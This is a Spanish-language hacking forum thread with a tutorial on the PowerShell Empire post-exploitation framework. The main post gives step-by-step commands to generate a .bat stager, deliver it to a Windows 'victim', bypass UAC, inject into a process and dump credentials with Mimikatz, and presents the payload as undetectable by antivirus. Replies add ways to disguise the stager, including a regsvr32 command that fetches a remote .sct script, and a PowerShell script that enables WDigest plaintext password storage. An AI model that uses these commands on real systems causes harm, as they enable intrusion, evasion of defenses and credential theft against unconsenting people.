Empire la nueva herramienta de PowerShell & Post-Explotación

  • 5 Respuestas
  • 5885 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BrowserNet

  • *
  • Underc0der
  • Mensajes: 89
  • Actividad:
    0%
  • Reputación 2
  • El TioCyberPunks esta en el barco
  • Skype: browsernet
    • Ver Perfil


Saludos mis hermanos de underc0de en esta oportunidad les traigo una herramienta llamada "Empire", según el autor data que es un agente de post-explotación PowerShell construido sobre comunicaciones cryptologically seguras y una arquitectura flexible, se parece mucho a metasploit, pero mas se asemeja pupy,  pero este siempre tendrá la sesiones de las victimas, esta herramienta fue presentada en el BSidesLV en 2015.

¿Para que sirve Empire?

Empire implementa la capacidad de ejecutar agentes PowerShell sin necesidad powershell.exe, los módulos de post-explotación de despliegue rápido que van desde los registradores de claves a Mimikatz y comunicaciones adaptables para evadir la detección de redes, todo envuelto en un marco centrado en la facilidad de uso.

sitio oficial: You are not allowed to view links. Register or Login

Si desean ver la presentación del manejo de la herramienta, que en verdad es muy buena! pueden visitar el siguiente enlace:

You are not allowed to view links. Register or Login



 Instalación:

Código: You are not allowed to view links. Register or Login
[email protected]:~# git clone https://github.com/PowerShellEmpire/Empire.git
[email protected]:~# cd Empire
[email protected]:~/Empire# ./setup/install.sh

como vemos al instalar los módulos del empire automáticamente pasara a descargar los complementos que necesita, para poder ejecutar la herramienta con éxito.



 en mi caso algunas ya las tengo instaladas y actualizadas, pero otras no como son las siguientes que mostrare en la siguiente imagen:



en mi caso salio un error en la sintaxis 15 referente al archivo ./setup_database.py, algunas personas siempre ignoran un pequeño error de una linea  y trata de ejecutar el Empire u otra herramienta con normalidad y al final les arrojaría los errores comunes.

Código: You are not allowed to view links. Register or Login
[email protected]:~/Empire# ./empire


yo creo que el 60% se rendiría y no ejecutaría la herramienta, hasta nosotros lo hemos hecho pero estamos aquí referentes para dar el consejo "Lean", si nos dice que no se encuentra dicho archivo lo que haremos sera entrar a la carpeta setup y ejecutar el archivo setup_database.py para instalar la base de datos

Código: You are not allowed to view links. Register or Login
[email protected]:~/Empire# cd setup
[email protected]:~/Empire/setup# python setup_database.py



Una ves que términos todo este proceso, pasaremos a configurar e instalar nuestro certificado, en el archivo "cert.sh.

Código: You are not allowed to view links. Register or Login
[email protected]:~/Empire/setup# ./cert.sh


Luego de ello, nos dirigiremos a la carpeta de inicio y ejecutaremos el Empire
Código: You are not allowed to view links. Register or Login
[email protected]:~/Empire/setup# cd ..
ro[email protected]:~/Empire# ./empire



como vemos nos cargar perfectamente sin ningún error, entonces vayamos prácticamente a la acción como se dice en Perú, "Menos floro y mas acción", vamos a configurar nuestro servidor de infección iremos a la sección "Listeners", como podemos observar añadí el nombre initial , ustedes pueden poner lo que gusten.
Código: You are not allowed to view links. Register or Login
(Empire) > listeners
(Empire: listeners) > info
(Empire: listeners) > set Name initial
(Empire: listeners) > execute
(Empire: listeners) > list




lo que haremos sera interactuar con la plataforma y empezaremos  a buscar e interpretar un archivo ejecutable pero en extensión .bat.

Código: You are not allowed to view links. Register or Login
(Empire: listeners) > usestager launcher_bat initial

la cual se genero en la ultima linea:
  • Stager output written out to: /tmp/launcher.bat[/li][/list]

    entonces abriremos otra terminal y nos dirigiremos a la siguiente carpeta para mover-la al modulo del escritorio

    Código: You are not allowed to view links. Register or Login
    [email protected]:~# cp /tmp/launcher.bat /root/Desktop/



    al ejecutar el movimiento al escritorio,le enviaremos el archivo a nuestra victima, si desean ver el código del payload pueden abrirlo con leafpad en mi caso, ya saben que siempre lo ejecuto mediante nano:
    Código: You are not allowed to view links. Register or Login
    [email protected]:~# cd Desktop
    [email protected]:~/Desktop# nano launcher.bat



    bueno continuando con lo siguiente, pasaremos a enviarle el archivo a nuestra victima, en mi caso mi victima estará con un windows 8



    al momento que la victima aya ejecutado nuestro archivo, que por cierto es indetectable por los AV nos dirigiremos a nuestro terminal para ver los servidores de escucha que están conectados, en nuestro caso la victima.
    Código: You are not allowed to view links. Register or Login
    (Empire: stager/launcher_bat) > agents
    (Empire: agents) > list

    Como vemos al iniciar



    Entonces entraremos al interactuar con nuestra primera victima para ello ejecutaremos la siguiente sintaxis.

    Código: You are not allowed to view links. Register or Login
    (Empire: agents) > interact 3R3CUZRTP13B1HGV
    (Empire: agents) > rename DC
    una ves aplicado ello, pondremos el comando "help", para ver las opciones que podemos utilizar las cuales son las siguientes:



    Entonces lo que debemos hacer primero es ejecutar el Bypass de UAC para poder escalar privilegios administrativos para añadir algunas de estas opciones, las cuales les serán de mucha utilidad.

    Código: You are not allowed to view links. Register or Login
    (Empire: agents) >  interact DC
    (Empire: agents) >  usemodule privesc/powerup/allchecks
    (Empire: agents) >  info
    (Empire: agents) >  execute
    (Empire: agents) >  back



    entonces empezara a cargar los módulos de explotación del UAC, como vemos nos aparecen el siguiente mensaje con la cual nos dice que se esta ejecutando los servicios enfocados en cada sección



    una ves cargado pasaremos a ejecutar el  bypass para explotarlo en one.
    Código: You are not allowed to view links. Register or Login
    (Empire: DC) > bypassuac initial
    (Empire: DC) >

    luego de que cargase lo siguiente e inicie la activación, pasaremos a dirigimos a la lista e interpretaremos con el nuevo proceso llamado UTLZ1UEP1LEXHPKG la cual es el usuario administrativo interceptado.
    Código: You are not allowed to view links. Register or Login
    (Empire: DC) > agents
    (Empire: agents) > interact UTLZ1UEP1LEXHPKG

    nuevamente  nombraremos él nombre del servicio, como  PhishedUserHigh
    Código: You are not allowed to view links. Register or Login
    (Empire: UTLZ1UEP1LEXHPKG) > rename PhishedUserHigh
    para culminar vamos a mirar los procesos que corren y como vemos son los procesos administrativos para que ven que lo son.
    Código: You are not allowed to view links. Register or Login
    (Empire: PhishedUserHigh) > ps
    (Empire: PhishedUserHigh) > back



    en mi caso escogí el proceso explorer que tiene el PID 292, para inyectar mi sesión  y como vemos hemos creado otro servicio con el nombre 1Z2NWDRLUUV1D1KK pero con el proceso cambiado que le otorgamos.
    Código: You are not allowed to view links. Register or Login
    (Empire: agents) > interact PhishedUserHigh
    (Empire: PhishedUserHigh) > psinject initial 392
    (Empire: management/psinject) > execute




    ahora pasaremos a dumpear del sistema mediante mimikatz, en este caso escogere el usuario administrativo PhishedUserHigh
    Código: You are not allowed to view links. Register or Login
    (Empire: agents) > interact PhishedUserHigh
    (Empire: PhishedUserHigh) > usemodule credentials/mimikatz/lsadump
    (Empire: credentials/mimikatz/lsadump) > info
    (Empire: credentials/mimikatz/lsadump) > execute
    (Empire: credentials/mimikatz/lsadump) > back



    Esperaremos a que cargue el modulo de dumpeo................ : )



    Esto fue todo por ahora, espero haberles ayudado mucho quise expandir mas este POST, porque me falto algunas opciones mas, pero yo los saque de la referencia de la presentación, ustedes pueden verlo y aprender mas sobre esta herramienta, en fin.

    Un saludo !!! Happy Hackingª

Desconectado Mick Thomson

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
¿existe alguna forma de ocultar el .bat en algun tipo de macro para camuflajearlo en un documento de Microsoft Office?

Desconectado cybervaca

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
En muchas maneras de "esconder" el .bat o el script que crea el agente.

Te dejo aqui algunas opciones que tienes.

1. Meter el script en un .exe. ¿Como puedes hacer esto?, con muchas aplicaciones, como por ejemplo "iexpress.exe".
2. Usar un exploit el cual sea funcional para la victima, y de payload windows/exec y el script que te crea el empire.
3. Haciendo un bypass con regsvr32 /s /n /u /i:http://www.nuestraweb.com/empire.sct. Dentro del SCT se puede embeber un wscript que lance el powershell.

Con esto lo que te venimos a decir, que hay miles de maneras de hacerlo, sólo, hay que tener imaginación.

Ya que estamos hablando de empire, uno de los payloads es mimikatz. ¿Hay alguien que haya conseguido encodearlo para que haga un bypass con los antivirus?

Yo lo que hago es desactivar el antivirus porque mimikatz es detectable...


Si os gusta el powershell como lenguaje de post explotacion.

Echarle un ojo a este script:

You are not allowed to view links. Register or Login

Este script es capaz de leer el user y password en texto plano desde la memoria.


Por cierto, para que te funcione debes crear un clave en el reg.

Te dejo un script que me hice para crearla con un bypass:


param(
[string]$Activar="si"

)

$ErrorActionPreference = "SilentlyContinue"
if ($Activar -like "si" -or $args -like "Si") {$Activar="Si"} else {$Activar="No"}

######################################################################################################################

$ruta_key = "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
$key = "UseLogonCredential"
$check_exist_key = Test-Path $ruta_key
if ($check_exist_key -eq $null) {$check_exist_key = "False"}
$check_valor_key = Get-ItemProperty $ruta_key | Select-Object $key ; $check_valor_key = $check_valor_key.UseLogonCredential

######################################################################################################################


if ($Activar -eq "Si") { New-ItemProperty -Path $ruta_key -Name $key -Value "1" -PropertyType DWORD -Force| Out-Null; Write-Host "`n`nAñadida clave de registro, es necesario reiniciar." }
if ($Activar -eq "No") {Remove-ItemProperty $ruta_key -Name $key  -Force | Out-Null ; "`n`nEliminada clave de registro, es necesario reiniciar."}

Desconectado Intlock

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
(Empire: PhishedUserHigh) > psinject initial 392
(Empire: management/psinject) > execute

Inicia el job pero no se inyecta, que podría ser?

Desconectado EPARA

  • *
  • Underc0der
  • Mensajes: 35
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
Coño muy bueno el tuto, en lo que el tiempo me lo permita lo pondre a prueba y comentare, Gracias! Bro...

Desconectado cybervaca

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
You are not allowed to view links. Register or Login
(Empire: PhishedUserHigh) > psinject initial 392
(Empire: management/psinject) > execute

Inicia el job pero no se inyecta, que podría ser?

Quizá no te injecta porque no tienes permisos de administrador local. ¿Te sale un * como que tienes privilegios de administracion local?

 

Usando la herramienta "Weevely"

Iniciado por OswireW0rding

Respuestas: 1
Vistas: 4235
Último mensaje Marzo 11, 2014, 07:12:05 pm
por Acidkode
Herramienta OSINT para buscar contraseñas para direcciones de correo electrónico

Iniciado por Gold Master

Respuestas: 13
Vistas: 5125
Último mensaje Junio 13, 2020, 06:00:46 pm
por topgun1964
Herramienta Scanner y explota Eternalblue(MS17-010) / Bluekeep (CVE-2019-0708)

Iniciado por harold12631

Respuestas: 1
Vistas: 1009
Último mensaje Octubre 11, 2019, 03:06:13 pm
por KiddArabic
[VMInjector] Inyección DLL herramienta para desbloquear máquinas virtuales

Iniciado por Aryenal.Bt

Respuestas: 1
Vistas: 3858
Último mensaje Noviembre 30, 2012, 09:43:40 pm
por Harkonidaz
[TOOL] - Neto: Una herramienta para analizar las extensiones del navegador

Iniciado por puntoCL

Respuestas: 0
Vistas: 2489
Último mensaje Julio 31, 2018, 03:45:00 am
por puntoCL